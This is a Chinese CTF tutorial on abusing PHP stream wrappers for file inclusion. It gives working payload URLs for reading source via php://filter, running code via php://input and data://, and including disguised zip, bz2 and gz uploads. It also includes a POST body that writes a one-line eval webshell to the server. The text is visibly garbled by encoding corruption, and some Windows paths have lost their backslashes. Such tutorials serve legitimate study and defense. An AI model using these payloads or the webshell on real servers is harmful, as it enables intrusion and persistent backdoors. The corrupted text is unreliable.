站長(zhǎng)資訊網(wǎng)
file:// 協(xié)議
-
條件:
allow_url_fopen:off/onallow_url_include:off/on
- 作用:
用于訪問本地文件系統(tǒng),在CTF中通常用來讀取本地文件的且不受allow_url_fopen與allow_url_include的影響。include()/require()/include_once()/require_once()參數(shù)可控的情況下,如導(dǎo)入為非.php文件,則仍按照php語法進(jìn)行解析,這是include()函數(shù)所決定的。 - 說明:
file://文件系統(tǒng)是 PHP 使用的默認(rèn)封裝協(xié)議,展現(xiàn)了本地文件系統(tǒng)。當(dāng)指定了一個(gè)相對(duì)路徑(不以/、、或 Windows 盤符開頭的路徑)提供的路徑將基于當(dāng)前的工作目錄。在很多情況下是腳本所在的目錄,除非被修改了。使用 CLI 的時(shí)候,目錄默認(rèn)是腳本被調(diào)用時(shí)所在的目錄。在某些函數(shù)里,例如fopen()和file_get_contents(),include_path會(huì)可選地搜索,也作為相對(duì)的路徑。 -
用法:
/path/to/file.ext relative/path/to/file.ext fileInCwd.ext C:/path/to/winfile.ext C:pathtowinfile.ext \smbserversharepathtowinfile.ext file:///path/to/file.ext
-
示例:
-
file://[文件的絕對(duì)路徑和文件名]http://127.0.0.1/include.php?file=file://E:phpStudyPHPTutorialWWWphpinfo.txt
-
[文件的相對(duì)路徑和文件名]http://127.0.0.1/include.php?file=./phpinfo.txt
-
[http://網(wǎng)絡(luò)路徑和文件名]http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
-
- 參考:http://php.net/manual/zh/wrappers.file.php
php:// 協(xié)議
-
條件:
allow_url_fopen:off/onallow_url_include:僅php://input php://stdin php://memory php://temp需要on
- 作用:
php://訪問各個(gè)輸入/輸出流(I/O streams),在CTF中經(jīng)常使用的是php://filter和php://input,php://filter用于讀取源碼,php://input用于執(zhí)行php代碼。 -
說明:
PHP 提供了一些雜項(xiàng)輸入/輸出(IO)流,允許訪問 PHP 的輸入輸出流、標(biāo)準(zhǔn)輸入輸出和錯(cuò)誤描述符,
內(nèi)存中、磁盤備份的臨時(shí)文件流以及可以操作其他讀取寫入文件資源的過濾器。協(xié)議 作用 php://input 可以訪問請(qǐng)求的原始數(shù)據(jù)的只讀流,在POST請(qǐng)求中訪問POST的 data部分,在enctype="multipart/form-data"的時(shí)候php://input是無效的。php://output 只寫的數(shù)據(jù)流,允許以 print 和 echo 一樣的方式寫入到輸出緩沖區(qū)。 php://fd (>=5.3.6)允許直接訪問指定的文件描述符。例如 php://fd/3引用了文件描述符 3。php://memory php://temp (>=5.1.0)一個(gè)類似文件包裝器的數(shù)據(jù)流,允許讀寫臨時(shí)數(shù)據(jù)。兩者的唯一區(qū)別是 php://memory總是把數(shù)據(jù)儲(chǔ)存在內(nèi)存中,而php://temp會(huì)在內(nèi)存量達(dá)到預(yù)定義的限制后(默認(rèn)是2MB)存入臨時(shí)文件中。臨時(shí)文件位置的決定和sys_get_temp_dir()的方式一致。php://filter (>=5.0.0)一種元封裝器,設(shè)計(jì)用于數(shù)據(jù)流打開時(shí)的篩選過濾應(yīng)用。對(duì)于一體式 (all-in-one)的文件函數(shù)非常有用,類似readfile()、file()和file_get_contents(),在數(shù)據(jù)流內(nèi)容讀取之前沒有機(jī)會(huì)應(yīng)用其他過濾器。 -
php://filter參數(shù)詳解該協(xié)議的參數(shù)會(huì)在該協(xié)議路徑上進(jìn)行傳遞,多個(gè)參數(shù)都可以在一個(gè)路徑上傳遞。具體參考如下:
php://filter 參數(shù) 描述 resource=<要過濾的數(shù)據(jù)流> 必須項(xiàng)。它指定了你要篩選過濾的數(shù)據(jù)流。 read=<讀鏈的過濾器> 可選項(xiàng)。可以設(shè)定一個(gè)或多個(gè)過濾器名稱,以管道符(* *)分隔。 write=<寫鏈的過濾器> 可選項(xiàng)。可以設(shè)定一個(gè)或多個(gè)過濾器名稱,以管道符( )分隔。 <; 兩個(gè)鏈的過濾器> 任何沒有以 read= 或 write= 作前綴的篩選器列表會(huì)視情況應(yīng)用于讀或?qū)戞湣?/td> -
可用的過濾器列表(4類)
此處列舉主要的過濾器類型,詳細(xì)內(nèi)容請(qǐng)參考:https://www.php.net/manual/zh/filters.php
字符串過濾器 作用 string.rot13 等同于 str_rot13(),rot13變換string.toupper 等同于 strtoupper(),轉(zhuǎn)大寫字母string.tolower 等同于 strtolower(),轉(zhuǎn)小寫字母string.strip_tags 等同于 strip_tags(),去除html、PHP語言標(biāo)簽轉(zhuǎn)換過濾器 作用 convert.base64-encode & convert.base64-decode 等同于 base64_encode()和base64_decode(),base64編碼解碼convert.quoted-printable-encode & convert.quoted-printable-decode quoted-printable 字符串與 8-bit 字符串編碼解碼 壓縮過濾器 作用 zlib.deflate & zlib.inflate 在本地文件系統(tǒng)中創(chuàng)建 gzip 兼容文件的方法,但不產(chǎn)生命令行工具如 gzip的頭和尾信息。只是壓縮和解壓數(shù)據(jù)流中的有效載荷部分。 bzip2.compress & bzip2.decompress 同上,在本地文件系統(tǒng)中創(chuàng)建 bz2 兼容文件的方法。 加密過濾器 作用 mcrypt.* libmcrypt 對(duì)稱加密算法 mdecrypt.* libmcrypt 對(duì)稱解密算法 -
示例:
-
php://filter/read=convert.base64-encode/resource=[文件名]讀取文件源碼(針對(duì)php文件需要base64編碼)http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
-
php://input + [POST DATA]執(zhí)行php代碼http://127.0.0.1/include.php?file=php://input [POST DATA部分] <?php phpinfo(); ?>
若有寫入權(quán)限,寫入一句話木馬
http://127.0.0.1/include.php?file=php://input [POST DATA部分] <?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
-
- 參考:https://php.net/manual/zh/wrappers.php.php
zip:// & bzip2:// & zlib:// 協(xié)議
-
條件:
allow_url_fopen:off/onallow_url_include:off/on
- 作用:
zip:// & bzip2:// & zlib://均屬于壓縮流,可以訪問壓縮文件中的子文件,更重要的是不需要指定后綴名,可修改為任意后綴:jpg png gif xxx等等。 -
示例:
-
zip://[壓縮文件絕對(duì)路徑]%23[壓縮文件內(nèi)的子文件名](#編碼為%23)壓縮 phpinfo.txt 為 phpinfo.zip ,壓縮包重命名為 phpinfo.jpg ,并上傳
http://127.0.0.1/include.php?file=zip://E:phpStudyPHPTutorialWWWphpinfo.jpg%23phpinfo.txt
-
compress.bzip2://file.bz2壓縮 phpinfo.txt 為 phpinfo.bz2 并上傳(同樣支持任意后綴名)
http://127.0.0.1/include.php?file=compress.bzip2://E:phpStudyPHPTutorialWWWphpinfo.bz2
-
compress.zlib://file.gz壓縮 phpinfo.txt 為 phpinfo.gz 并上傳(同樣支持任意后綴名)
http://127.0.0.1/include.php?file=compress.zlib://E:phpStudyPHPTutorialWWWphpinfo.gz
-
- 參考:http://php.net/manual/zh/wrappers.compression.php
data:// 協(xié)議
-
條件:
allow_url_fopen:onallow_url_include:on
- 作用:自
PHP>=5.2.0起,可以使用data://數(shù)據(jù)流封裝器,以傳遞相應(yīng)格式的數(shù)據(jù)。通常可以用來執(zhí)行PHP代碼。 -
用法:
data://text/plain, data://text/plain;base64,
-
示例:
-
data://text/plain,http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
-
data://text/plain;base64,http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
-
http:// & https:// 協(xié)議
-
條件:
allow_url_fopen:onallow_url_include:on
- 作用:常規(guī) URL 形式,允許通過
HTTP 1.0的 GET方法,以只讀訪問文件或資源。CTF中通常用于遠(yuǎn)程包含。 -
用法:
http://example.com http://example.com/file.php?var1=val1&var2=val2 http://user:password@example.com https://example.com https://example.com/file.php?var1=val1&var2=val2 https://user:password@example.com
-
示例:
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
phar:// 協(xié)議
phar://協(xié)議與zip://類似,同樣可以訪問zip格式壓縮包內(nèi)容,在這里只給出一個(gè)示例:
http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
另外在 Black Hat 2018 大會(huì)上,研究人員公布了一款針對(duì)PHP應(yīng)用程序的全新攻擊技術(shù):phar://協(xié)議對(duì)象注入技術(shù)。
因?yàn)樵摾命c(diǎn)需要滿足一定的條件才能利用,可以參考下面這篇文章,里面的demo也非常詳細(xì),留作以后專門研究一下。
